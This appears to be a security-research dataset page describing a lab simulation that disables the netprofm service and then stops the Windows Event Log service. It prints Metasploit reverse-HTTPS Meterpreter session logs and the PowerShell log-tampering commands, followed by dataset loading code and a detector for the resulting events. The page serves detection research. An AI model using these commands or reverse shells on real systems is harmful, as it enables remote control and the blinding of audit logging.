Stopping Event Log Service after Stopping Depending Services
Metadata

| Field | Value |
|---|---|
| Contributors | Jose Rodriguez @Cyb3rPandaH |
| Creation Date | 2022/07/08 |
| Modification Date | 2022/08/08 |
| Tactics | |
| Techniques | |
| Tags | powershell,eventlog,netprofm |
Dataset Description

The simulation of this technique considers 2 steps: disabling the netprofm service (before reboot) and stopping the Event Log service (after reboot). Therefore, 2 datasets were generated: before-reboot and after-reboot data. We used PowerShell to execute this simulation in two ways: execution using PowerShell (spawned from cmd.exe) and execution using the PowerShell module from Metasploit. This dataset was generated using a Windows 10 Pro Evaluation edition (Version: 1903, OS Build: 18362.30).
Datasets Downloads

| Type | Link |
|---|---|
| Host | |
| Host | |
| Host | |
| Host | |
Adversary View

Using PowerShell (cmd.exe) - Before reboot:

```
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: e2mshuiq) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:30:15 -0400
meterpreter > shell
Process 9804 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\IT01-Pedro\Downloads> Set-Service -Name netprofm -StartupType Disabled
Set-Service -Name netprofm -StartupType Disabled
PS C:\Users\IT01-Pedro\Downloads>
```
Using PowerShell (cmd.exe) - After reboot:

```
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: v8fufyz7) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:48:54 -0400
meterpreter > shell
Process 1536 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\IT01-Pedro\Downloads> Stop-Service -Name EventLog -Force
Stop-Service -Name EventLog -Force
PS C:\Users\IT01-Pedro\Downloads> Get-Service -Name eventlog
Get-Service -Name eventlog
Status Name DisplayName
------ ---- -----------
Stopped eventlog Windows Event Log
PS C:\Users\IT01-Pedro\Downloads>
```
Using PowerShell (Metasploit) - Before reboot:

```
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: l4nzbqn1) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:39:26 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute " Set-Service -Name netprofm -StartupType Disabled "
[+] Command execution completed:
meterpreter >
```
Using PowerShell (Metasploit) - After reboot:

```
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: khsnizoi) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 6 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:55:45 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute " Stop-Service -Name EventLog -Force "
[+] Command execution completed:
meterpreter > powershell_execute "get-service -Name EventLog"
[+] Command execution completed:
Status Name DisplayName
------ ---- -----------
Stopped EventLog Windows Event Log
meterpreter >
```
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# The dataset URL must be a string literal (the original line was missing its quotes)
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_before_reboot.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early on a bad download instead of on a corrupt zip
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) JSON-lines file in the archive and keep its path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

Read JSON File

```python
import pandas as pd

# Each line of the extracted file is one event record
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```

Access Security Events

```python
# Count events per log channel, most frequent channel first
df.groupby(['Channel']).size().sort_values(ascending=False)
```
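As an added example that is not part of the original dataset page or the OTRF project code, the following detector reads records in the same JSON-lines shape and flags both stages of this simulation: the dependent netprofm service being set to disabled (System 7040), the Event Log service entering the stopped state (System 7036), the Security log's own shutdown record (1100), and a logged script block that stops the service (PowerShell 4104). The field names Channel, EventID, Hostname, Message and ScriptBlockText, and the sample records themselves, are assumptions constructed for this example.

```python
import io
import json
import pandas as pd

# Constructed sample records in a Security-Datasets-like JSON-lines shape
# (field names are assumptions, not taken from the real export).
SAMPLE_JSONL = "\n".join(json.dumps(r) for r in [
    {"Channel": "System", "EventID": 7040, "Hostname": "WORKSTATION5",
     "Message": "The start type of the Network List Service service was changed from demand start to disabled."},
    {"Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104, "Hostname": "WORKSTATION5",
     "ScriptBlockText": "Stop-Service -Name EventLog -Force"},
    {"Channel": "System", "EventID": 7036, "Hostname": "WORKSTATION5",
     "Message": "The Windows Event Log service entered the stopped state."},
    {"Channel": "Security", "EventID": 1100, "Hostname": "WORKSTATION5",
     "Message": "The event logging service has shut down."},
    {"Channel": "System", "EventID": 7036, "Hostname": "WORKSTATION5",
     "Message": "The Print Spooler service entered the running state."},  # benign noise
])

def load_events(jsonl_text: str) -> pd.DataFrame:
    """Parse JSON-lines text the same way the notebook reads the dataset file."""
    return pd.read_json(io.StringIO(jsonl_text), lines=True)

def find_eventlog_tampering(df: pd.DataFrame) -> pd.DataFrame:
    """Return the rows matching each stage of the technique, labelled by rule."""
    # Columns may be absent when no event of that kind exists; treat them as empty
    msg = df.get("Message", pd.Series("", index=df.index)).fillna("").astype(str)
    sbt = df.get("ScriptBlockText", pd.Series("", index=df.index)).fillna("").astype(str)
    rules = [
        ("netprofm_disabled", (df["EventID"] == 7040) & msg.str.contains("Network List Service") & msg.str.contains("disabled")),
        ("eventlog_stopped", (df["EventID"] == 7036) & msg.str.contains("Windows Event Log service entered the stopped state")),
        ("logging_shutdown", (df["EventID"] == 1100) & (df["Channel"] == "Security")),
        ("stop_service_cmd", (df["EventID"] == 4104) & sbt.str.contains(r"Stop-Service.*EventLog", case=False)),
    ]
    frames = []
    for label, mask in rules:
        sub = df.loc[mask, ["Hostname", "Channel", "EventID"]].copy()
        sub["Rule"] = label
        frames.append(sub)
    return pd.concat(frames).sort_index()  # back in original event order

def hosts_with_full_chain(hits: pd.DataFrame) -> list:
    """Hosts where both steps (dependent service disabled, Event Log stopped) were seen."""
    per_host = hits.groupby("Hostname")["Rule"].apply(set)
    return sorted(h for h, rules in per_host.items() if {"netprofm_disabled", "eventlog_stopped"} <= rules)

if __name__ == "__main__":
    hits = find_eventlog_tampering(load_events(SAMPLE_JSONL))
    print(hits)
    print("Full chain observed on:", hosts_with_full_chain(hits))
```

Because the Event Log service itself stops in the second stage, the 7036/1100 records are the last ones the host writes; the 7040 change on the dependent service before the reboot is the earlier, still-logged signal worth alerting on.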